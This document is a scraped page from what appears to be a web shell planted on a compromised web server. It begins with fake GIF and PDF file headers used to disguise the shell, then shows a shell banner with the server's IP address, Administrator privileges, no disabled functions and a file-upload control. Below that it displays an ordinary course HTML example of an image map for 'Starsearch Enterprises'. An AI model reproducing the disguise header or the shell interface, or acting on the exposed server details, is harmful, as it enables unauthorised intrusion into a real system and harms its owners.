GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/_Archive/MMDT1021/ExampleFiles/HTML6ed_examples/links/ |
Upload File : |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" /> <title>Creating a client-side image map</title> </head> <body> <p> <map name="banner" id="banner"> <area shape="rect" coords="395, 18, 445, 35" href="newinfo.html" alt="new information" /> <area shape="rect" coords="395, 38, 445, 55" href="pressrelease.html" alt="press releases" /> <area shape="rect" coords="395, 58, 445, 75" href="events.html" alt="events" /> </map> <img src="clickimage.gif" alt="SE banner" usemap="#banner" width= "450" height="100" /> </p> <div id="content"> <h1>Starsearch Enterprises</h1> <a href="newinfo.html">New programs</a><br /> <a href="pressrelease.html">Press releases</a><br /> <a href="events.html">Upcoming events</a><br /> <a href="infoSE.html">About Starsearch Enterprises</a><br /> </div> </body> </html>